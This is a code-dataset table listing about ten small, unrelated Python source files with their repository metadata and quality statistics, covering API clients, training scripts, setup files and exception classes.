hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9fb6e449fa62cd3c86a16e60d01fcdd30c301e7a | 747 | py | Python | pyopenproject/business/services/command/time_entry/find_schema.py | webu/pyopenproject | 40b2cb9fe0fa3f89bc0fe2a3be323422d9ecf966 | [
"MIT"
] | 5 | 2021-02-25T15:54:28.000Z | 2021-04-22T15:43:36.000Z | pyopenproject/business/services/command/time_entry/find_schema.py | webu/pyopenproject | 40b2cb9fe0fa3f89bc0fe2a3be323422d9ecf966 | [
"MIT"
] | 7 | 2021-03-15T16:26:23.000Z | 2022-03-16T13:45:18.000Z | pyopenproject/business/services/command/time_entry/find_schema.py | webu/pyopenproject | 40b2cb9fe0fa3f89bc0fe2a3be323422d9ecf966 | [
"MIT"
] | 6 | 2021-06-18T18:59:11.000Z | 2022-03-27T04:58:52.000Z | from pyopenproject.api_connection.exceptions.request_exception import RequestError
from pyopenproject.api_connection.requests.get_request import GetRequest
from pyopenproject.business.exception.business_error import BusinessError
from pyopenproject.business.services.command.time_entry.time_entry_command import TimeEntryCommand
from pyopenproject.model.schema import Schema
class FindSchema(TimeEntryCommand):
def __init__(self, connection):
super().__init__(connection)
def execute(self):
try:
json_obj = GetRequest(self.connection, f"{self.CONTEXT}/schema").execute()
return Schema(json_obj)
except RequestError as re:
raise BusinessError("Error finding schema.") from re
| 39.315789 | 98 | 0.771084 | 83 | 747 | 6.722892 | 0.481928 | 0.15233 | 0.071685 | 0.107527 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156627 | 747 | 18 | 99 | 41.5 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0.056225 | 0.028112 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.357143 | 0 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
4cbc22c6d799e2812e523d82b271f4e49980e77c | 488 | py | Python | examples/experimental/pipelining.py | hhuuggoo/kitchensink | 1f81050fec7eace52e0b4e1b47851b649a4e4d33 | [
"BSD-3-Clause"
] | 2 | 2015-03-17T05:02:42.000Z | 2016-04-07T15:02:28.000Z | examples/experimental/pipelining.py | hhuuggoo/kitchensink | 1f81050fec7eace52e0b4e1b47851b649a4e4d33 | [
"BSD-3-Clause"
] | null | null | null | examples/experimental/pipelining.py | hhuuggoo/kitchensink | 1f81050fec7eace52e0b4e1b47851b649a4e4d33 | [
"BSD-3-Clause"
] | 1 | 2015-10-07T21:50:44.000Z | 2015-10-07T21:50:44.000Z | import logging
import time
import pandas as pd
import numpy as np
from kitchensink.clients.http import Client
from kitchensink.data import RemoteData
from kitchensink import settings
settings.setup_client("http://localhost:6323/")
c = Client(settings.rpc_url)
"""follow multi node instructions from README.md
"""
df = pd.DataFrame({'a' : np.arange(100000)})
remote = RemoteData(obj=df)
retval = remote.pipeline(prefix='pipeline_test')
print retval
print c.data_info([remote.data_url])
| 24.4 | 48 | 0.782787 | 71 | 488 | 5.309859 | 0.577465 | 0.119363 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022989 | 0.108607 | 488 | 19 | 49 | 25.684211 | 0.843678 | 0 | 0 | 0 | 0 | 0 | 0.082569 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
4cca86788d8edf09b1ebce371891d7dd5a5312f6 | 7,670 | py | Python | death/trashcan/trainerC.py | Fuchai/mayoehr | ec79d2157bedf4f4f0fc783d86523df8a758e27c | [
"MIT"
] | null | null | null | death/trashcan/trainerC.py | Fuchai/mayoehr | ec79d2157bedf4f4f0fc783d86523df8a758e27c | [
"MIT"
] | null | null | null | death/trashcan/trainerC.py | Fuchai/mayoehr | ec79d2157bedf4f4f0fc783d86523df8a758e27c | [
"MIT"
] | null | null | null | # import pandas as pd
# from archi.computer import Computer
# import torch
# import numpy
# import pdb
# from pathlib import Path
# import os
# from os.path import abspath
# from death.post.inputgen_planC import InputGen
# from torch.utils.data import DataLoader
# import torch.nn as nn
# import archi.param as param
# from torch.autograd import Variable
# import gc
#
# batch_size = 1
#
#
# class dummy_context_mgr():
# def __enter__(self):
# return None
#
# def __exit__(self, exc_type, exc_value, traceback):
# return False
#
# def save_model(net, optim, epoch):
# epoch = int(epoch)
# task_dir = os.path.dirname(abspath(__file__))
# pickle_file = Path(task_dir).joinpath("saves/DNCfull_" + str(epoch)+ +"_"+str(i) + ".pkl")
# pickle_file = pickle_file.open('wb')
# torch.save((net, optim, epoch), pickle_file)
#
#
# def load_model(computer):
# task_dir = os.path.dirname(abspath(__file__))
# save_dir = Path(task_dir) / "saves"
# highestepoch = -1
# highestiter = -1
# for child in save_dir.iterdir():
# epoch = str(child).split("_")[2]
# iteration = str(child).split("_")[3].split('.')[0]
# iteration=int(iteration)
# epoch = int(epoch)
# # some files are open but not written to yet.
# if epoch > highestepoch and iteration>highestiter and child.stat().st_size > 2048:
# highestepoch = epoch
# highestiter=iteration
# if highestepoch == -1 and highestepoch==-1:
# return computer, None, -1
# pickle_file = Path(task_dir).joinpath("saves/DNCfull_" + str(highestepoch)+"_"+str(iteration) + ".pkl")
# print("loading model at ", pickle_file)
# pickle_file = pickle_file.open('rb')
# model, optim, epoch = torch.load(pickle_file)
#
# print('Loaded model at epoch ', highestepoch, 'iteartion', iteration)
#
# for child in save_dir.iterdir():
# epoch = str(child).split("_")[2].split('.')[0]
# iteration = str(child).split("_")[3].split('.')[0]
# if int(epoch) != highestepoch and int(iteration) != highestiter:
# os.remove(child)
# print('Removed incomplete save file and all else.')
#
# return model, optim, epoch
#
# def run_one_patient_one_step():
# # this is so python does garbage collection automatically.
# # we are debugging the
# pass
#
# def run_one_patient(computer, input, target, optimizer, loss_type, real_criterion,
# binary_criterion, validate=False, first=False):
#
# input = Variable(torch.Tensor(input).cuda())
# target = Variable(torch.Tensor(target).cuda())
#
# # we have no critical index, becuase critical index are those timesteps that
# # DNC is required to produce outputs. This is not the case for our project.
# # criterion does not need to be reinitiated for every story, because we are not using a mask
#
# time_length = input.size()[1]
# # with torch.no_grad if validate else dummy_context_mgr():
# patient_output = Variable(torch.Tensor(1, time_length, param.v_t)).cuda()
# for timestep in range(time_length):
# # first colon is always size 1
# feeding = input[:, timestep, :]
# output = computer(feeding)
# assert not (output!=output).any()
# patient_output[0, timestep, :] = output
#
# # patient_output: (batch_size 1, time_length, output_dim ~4000)
# time_to_event_output=patient_output[:,:,0]
# cause_of_death_output=patient_output[:,:,1:]
# time_to_event_target=target[:,:,0]
# cause_of_death_target=target[:,:,1:]
#
# patient_loss=None
#
# # this block will not work for batch input,
# # you should modify it so that the loss evaluation is not determined by logic but function.
# if loss_type[0]==0:
# # in record
# toe_loss = real_criterion(time_to_event_output,time_to_event_target)
# cod_loss = binary_criterion(cause_of_death_output,cause_of_death_target)
# patient_loss=toe_loss+cod_loss
# else:
# # not in record
# # be careful with the sign, penalize when and only when positive
# underestimation = time_to_event_target-time_to_event_output
# underestimation = nn.ReLU(underestimation)
# toe_loss = real_criterion(underestimation,0)
# cod_loss = binary_criterion(cause_of_death_output,cause_of_death_target)
# patient_loss=toe_loss+cod_loss
#
# if not validate:
# # TODO UNDERSTAND WHAT THE FLAG MEANS
# patient_loss.backward()
# optimizer.step()
#
# del input
# del target
#
# return patient_loss
#
#
# def train(computer, optimizer, real_criterion, binary_criterion,
# igdl, starting_epoch, total_epochs):
#
# for epoch in range(starting_epoch, total_epochs):
#
# for i, (input, target, loss_type) in enumerate(igdl):
#
# if i==0:
# train_story_loss = run_one_patient(computer, input, target, optimizer, loss_type,
# real_criterion,binary_criterion, first=True)
# else:
# train_story_loss = run_one_patient(computer, input, target, optimizer, loss_type,
# real_criterion,binary_criterion)
# computer.new_sequence_reset()
# gc.collect()
# del input, target, loss_type
# # torch.cuda.empty_cache()
# # print("#####################################")
# # print("printing all objects")
# # for obj in gc.get_objects():
# # try:
# # if torch.is_tensor(obj) or (hasattr(obj, 'data') and torch.is_tensor(obj.data)):
# # print(type(obj), obj.size())
# # except (OSError , ModuleNotFoundError, KeyError, NotImplementedError):
# # pass
#
# # if i % 100 == 0:
# print("learning. count: %4d, training loss: %.4f" %
# (i, train_story_loss[0]))
# # TODO No validation support for now.
# # val_freq = 16
# # if batch % val_freq == val_freq - 1:
# # print('summary. epoch: %4d, batch number: %4d, running loss: %.4f' %
# # (epoch, batch, running_loss / val_freq))
# # running_loss = 0
# # # also test the model
# # val_loss = run_one_story(computer, optimizer, story_length, batch_size, pgd, validate=False)
# # print('validate. epoch: %4d, batch number: %4d, validation loss: %.4f' %
# # (epoch, batch, val_loss))
#
# save_model(computer, optimizer, epoch)
# print("model saved for epoch ", epoch)
#
#
# if __name__=="__main__":
# total_epochs = 10
# lr = 1e-7
# optim = None
# starting_epoch = -1
#
# ig=InputGen()
# igdl=DataLoader(dataset=ig,batch_size=1,shuffle=False,num_workers=16)
#
# computer = Computer()
#
# # if load model
# # computer, optim, starting_epoch = load_model(computer)
#
# computer = computer.cuda()
# if optim is None:
# optimizer = torch.optim.Adam(computer.parameters(), lr=lr)
# else:
# print('use Adadelta optimizer with learning rate ', lr)
# optimizer = torch.optim.Adadelta(computer.parameters(), lr=lr)
#
# real_criterion=nn.SmoothL1Loss()
# binary_criterion=nn.BCEWithLogitsLoss()
#
# # starting with the epoch after the loaded one
#
# train(computer, optimizer, real_criterion, binary_criterion,
# igdl, int(starting_epoch) + 1, total_epochs)
| 38.737374 | 112 | 0.608605 | 920 | 7,670 | 4.866304 | 0.284783 | 0.020103 | 0.014742 | 0.031271 | 0.21644 | 0.184722 | 0.184722 | 0.157918 | 0.133795 | 0.114139 | 0 | 0.010827 | 0.26545 | 7,670 | 197 | 113 | 38.93401 | 0.783813 | 0.938592 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0.005076 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4ccaf2a923c6aa214769dc1a6e236dcc500eab3d | 2,791 | py | Python | scripts/site2samp.py | cz-ye/MetNet | 3711ca66fc43ffe051f9772e4ec5ec90b2a584b9 | [
"MIT"
] | null | null | null | scripts/site2samp.py | cz-ye/MetNet | 3711ca66fc43ffe051f9772e4ec5ec90b2a584b9 | [
"MIT"
] | null | null | null | scripts/site2samp.py | cz-ye/MetNet | 3711ca66fc43ffe051f9772e4ec5ec90b2a584b9 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
import sys, getopt
from Bio import SeqIO
from Bio.Seq import Seq
def generate_sample_seq(human_seq, mouse_seq, human_site, mouse_site, window, pos_sample, neg_sample):
i = 0
j = 0
print len(human_seq)
print len(mouse_seq)
flank = int(window)/2
for line in human_site.readlines():
temp = line.split('\t')
if temp[0] in human_seq:
if human_seq[temp[0]].seq[int(float(temp[1]))-1:int(float(temp[1]))+1] == 'AC':
before = -min(int(float(temp[1]))-flank-1, 0)
after = max(int(float(temp[1]))+flank-len(human_seq[temp[0]]), 0)
if int(float(temp[2])) == 1:
pos_sample.write(
'N'*before
+str(human_seq[temp[0]].seq[max(0, int(float(temp[1]))-flank-1):int(float(temp[1]))+flank])+
'N'*after+'\n')
elif int(float(temp[2])) == -1:
neg_sample.write(
'N'*before
+str(human_seq[temp[0]].seq[max(0,int(float(temp[1]))-flank-1):int(float(temp[1]))+flank])+
'N'*after+'\n')
else:
print "human wrong"
i+=1
else:
j+=1
print i, j
i = 0
j = 0
for line in mouse_site.readlines():
temp = line.split('\t')
if temp[0] in mouse_seq:
if mouse_seq[temp[0]].seq[int(float(temp[1]))-1:int(float(temp[1]))+1] == 'AC':
before = -min(int(float(temp[1]))-flank-1, 0)
after = max(int(float(temp[1]))+flank-len(mouse_seq[temp[0]]), 0)
if int(float(temp[2])) == 1:
pos_sample.write(
'N'*before
+str(mouse_seq[temp[0]].seq[max(0,int(float(temp[1]))-flank-1):int(float(temp[1]))+flank])
+'N'*after+'\n')
elif int(float(temp[2])) == -1:
neg_sample.write(
'N'*before
+str(mouse_seq[temp[0]].seq[max(0,int(float(temp[1]))-flank-1):int(float(temp[1]))+flank])
+'N'*after+'\n')
else:
print "mouse wrong"
i+=1
else:
j+=1
print i, j
return
def main(argv):
try:
opts, args = getopt.getopt(argv[1:], 'm:p:w:', ['mode=', 'path=', 'window='])
except getopt.GetoptError, err:
print(str(err))
sys.exit(2)
for o, a in opts:
if o in ('-m', '--mode'):
mode = a
if o in ('-p', '--path'):
path = a
if o in ('-w', '--window'):
window = a
mode2serial = {
'transcript_train': '0',
'transcript_test': '2',
'cdna_train': '1',
'cdna_test': '3'}
human_seq = SeqIO.to_dict(SeqIO.parse(path+"human_"+mode+'.txt', "fasta"))
mouse_seq = SeqIO.to_dict(SeqIO.parse(path+"mouse_"+mode+'.txt', "fasta"))
human_site = open(path+"human_pku"+mode2serial[mode], "r")
mouse_site = open(path+"mouse_pku"+mode2serial[mode], "r")
pos_sample = open(path+window+'/'+mode+"/p_samples", "w")
neg_sample = open(path+window+'/'+mode+"/n_samples", "w")
generate_sample_seq(human_seq, mouse_seq, human_site, mouse_site, window, pos_sample, neg_sample)
if __name__ == '__main__':
main(sys.argv)
| 27.91 | 102 | 0.602651 | 467 | 2,791 | 3.473233 | 0.175589 | 0.098644 | 0.147965 | 0.128237 | 0.635019 | 0.59926 | 0.59926 | 0.564735 | 0.564735 | 0.540074 | 0 | 0.030488 | 0.177356 | 2,791 | 99 | 103 | 28.191919 | 0.675958 | 0.007524 | 0 | 0.457831 | 1 | 0 | 0.083454 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.036145 | null | null | 0.084337 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4cd4609dffb156d76282a078d409e43fa656e910 | 555 | py | Python | setup.py | modgahead/django-periodic-tasks | 4ffe90c18fb77dce49658b294b7b090b258119a2 | [
"MIT"
] | 2 | 2018-02-25T18:31:59.000Z | 2020-04-30T11:23:57.000Z | setup.py | modgahead/django-periodic-tasks | 4ffe90c18fb77dce49658b294b7b090b258119a2 | [
"MIT"
] | null | null | null | setup.py | modgahead/django-periodic-tasks | 4ffe90c18fb77dce49658b294b7b090b258119a2 | [
"MIT"
] | 1 | 2020-05-01T09:54:54.000Z | 2020-05-01T09:54:54.000Z | from distutils.core import setup
setup(
name='django-periodic-tasks',
version='0.0.1',
packages=[
'periodic_tasks',
'periodic_tasks.migrations',
'periodic_tasks.management',
'periodic_tasks.management.commands',
],
package_dir={'': 'src'},
url='https://github.com/modgahead/django-periodic-tasks',
license='MIT',
author='Sergey Isayenko',
description='Periodic tasks app for Django',
install_requires=[
'Django>=1.8',
'croniter==0.3.16',
],
zip_safe=False
)
| 24.130435 | 61 | 0.616216 | 61 | 555 | 5.491803 | 0.672131 | 0.271642 | 0.113433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021028 | 0.228829 | 555 | 22 | 62 | 25.227273 | 0.761682 | 0 | 0 | 0.095238 | 0 | 0 | 0.452252 | 0.189189 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.047619 | 0 | 0.047619 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4cde658a1f9692b735ee78405c77302185b99630 | 921 | py | Python | src/backend/app_user_management/web_app_user.py | MatthewRizzo/timesheet_tracker | 4f492d7fe150430f899a7613e4d80af229db0ec9 | [
"MIT"
] | 2 | 2020-07-12T07:58:06.000Z | 2020-10-05T21:55:48.000Z | src/backend/app_user_management/web_app_user.py | MatthewRizzo/timesheet_tracker | 4f492d7fe150430f899a7613e4d80af229db0ec9 | [
"MIT"
] | 15 | 2020-07-15T19:24:42.000Z | 2022-01-20T00:55:09.000Z | src/backend/app_user_management/web_app_user.py | MatthewRizzo/timesheet_tracker | 4f492d7fe150430f899a7613e4d80af229db0ec9 | [
"MIT"
] | null | null | null | # -- External Packages -- #
from flask import Flask, redirect, flash
from flask_login import LoginManager, UserMixin
# -- Project Defined Imports -- #
from backend.backend_controller import BackendController
class WebAppUser(UserMixin):
"""Class defining what a "user" actually is.
\n:parma send_to_client_func - The function from app_manager capable of sending messages up a socket to the frontend
\n:param user_unique_id - A unique id given to each user
"""
def __init__(self, username: str, password: str, user_unique_id, send_to_client_func):
# A user is mostly the backend controller wrapped around identifiers for the account
self.username = username
self.password = password
self.backend_controller = BackendController(send_to_client=send_to_client_func, username=self.username)
# Required by extension of UserMixin
self.id = user_unique_id | 43.857143 | 120 | 0.741585 | 123 | 921 | 5.349594 | 0.495935 | 0.036474 | 0.072948 | 0.072948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194354 | 921 | 21 | 121 | 43.857143 | 0.886792 | 0.436482 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.222222 | 0.333333 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 2 |
4ce2d8e61e0296c603b3e69e37f228f1e42f2d9e | 315 | py | Python | activity/tests/datetime_scoring_period_tests.py | moneypro/espn-api | 65fd0b18f2f62d20aa2ee1dd0bfd5cb3d92bdd01 | [
"MIT"
] | 4 | 2021-01-20T15:05:05.000Z | 2021-05-15T02:54:29.000Z | activity/tests/datetime_scoring_period_tests.py | moneypro/espn-api | 65fd0b18f2f62d20aa2ee1dd0bfd5cb3d92bdd01 | [
"MIT"
] | null | null | null | activity/tests/datetime_scoring_period_tests.py | moneypro/espn-api | 65fd0b18f2f62d20aa2ee1dd0bfd5cb3d92bdd01 | [
"MIT"
] | null | null | null | from datetime import date
from activity.datetime_scoring_period import DatetimeScoringPeriod
class DatetimeScoringPeriodTest:
def setup(self):
self.target = DatetimeScoringPeriod()
def test_sanity(self):
d = date(year=2021, month=10, day=24)
assert 6 == self.target.convert(d)
| 21 | 66 | 0.714286 | 37 | 315 | 6 | 0.702703 | 0.09009 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035857 | 0.203175 | 315 | 14 | 67 | 22.5 | 0.848606 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
4cef34acb18fc5c71d3f4cac0b2080ca82e206a9 | 384 | py | Python | yt_concate/pipeline/steps/postflight.py | kinslersi/yt-concate | b68a842138997c48bf605e9811cf47f0db2faaa6 | [
"MIT"
] | null | null | null | yt_concate/pipeline/steps/postflight.py | kinslersi/yt-concate | b68a842138997c48bf605e9811cf47f0db2faaa6 | [
"MIT"
] | null | null | null | yt_concate/pipeline/steps/postflight.py | kinslersi/yt-concate | b68a842138997c48bf605e9811cf47f0db2faaa6 | [
"MIT"
] | null | null | null | import os
import logging
from yt_concate.pipeline.steps.step import Step
from yt_concate.setting import VIDEOS_DIR, CAPTIONS_DIR
class Postflight(Step):
def process(self, data, inputs, utils):
logger = logging.getLogger()
logger.info("in postflight")
if inputs["cleanup"] == "True":
os.remove(VIDEOS_DIR)
os.remove(CAPTIONS_DIR)
| 25.6 | 55 | 0.677083 | 49 | 384 | 5.183673 | 0.591837 | 0.047244 | 0.102362 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.223958 | 384 | 14 | 56 | 27.428571 | 0.852349 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
980c695d51dab28bcf2286d67c55fde0c3f561d3 | 260 | py | Python | TD/scripts/hooks.py | ulyssesdotcodes/vscode-ldjs | ac2c0300415f30fe3bbae41a62dc7f007c51fb83 | [
"BSD-3-Clause"
] | 13 | 2019-01-03T17:34:29.000Z | 2020-12-27T08:54:46.000Z | TD/scripts/hooks.py | ulyssesp/vscode-ldjs | ac2c0300415f30fe3bbae41a62dc7f007c51fb83 | [
"BSD-3-Clause"
] | 2 | 2021-10-05T19:55:56.000Z | 2022-02-17T19:01:08.000Z | TD/scripts/hooks.py | ulyssesp/vscode-ldjs | ac2c0300415f30fe3bbae41a62dc7f007c51fb83 | [
"BSD-3-Clause"
] | null | null | null | import time
def newJson(json):
print(op('container1/record')[0])
if op('container1/record')[0] == 1:
jsonRecord = op('json_record')
jsonRecord[0,0] = int(time.time())
jsonRecord[0,1] = json
op('json_record_out').par.write.pulse()
return
| 23.636364 | 43 | 0.646154 | 38 | 260 | 4.342105 | 0.5 | 0.145455 | 0.218182 | 0.230303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041475 | 0.165385 | 260 | 10 | 44 | 26 | 0.718894 | 0 | 0 | 0 | 0 | 0 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
981a78f293bba56a59977a034c7c8fe0c0bad22b | 663 | py | Python | givenergy_modbus/exceptions.py | dewet22/givenergy-modbus | 75e7ab7a7a6207c1b5efc2be5745bb393d9d840d | [
"Apache-2.0"
] | 3 | 2022-02-17T12:00:42.000Z | 2022-03-24T09:32:06.000Z | givenergy_modbus/exceptions.py | dewet22/givenergy-modbus | 75e7ab7a7a6207c1b5efc2be5745bb393d9d840d | [
"Apache-2.0"
] | 5 | 2022-01-24T15:25:17.000Z | 2022-03-17T18:17:24.000Z | givenergy_modbus/exceptions.py | dewet22/givenergy-modbus | 75e7ab7a7a6207c1b5efc2be5745bb393d9d840d | [
"Apache-2.0"
] | 5 | 2022-01-24T20:59:18.000Z | 2022-03-17T18:47:54.000Z | class ExceptionBase(Exception):
"""Base exception."""
message: str
def __init__(self, message: str) -> None:
super().__init__(message)
self.message = message
class InvalidPduState(ExceptionBase):
"""Thrown during PDU self-validation."""
def __init__(self, message: str, pdu) -> None:
super().__init__(message=message)
self.pdu = pdu
class InvalidFrame(ExceptionBase):
"""Thrown during framing when a message cannot be extracted from a frame buffer."""
frame: bytes
def __init__(self, message: str, frame: bytes) -> None:
super().__init__(message=message)
self.frame = frame
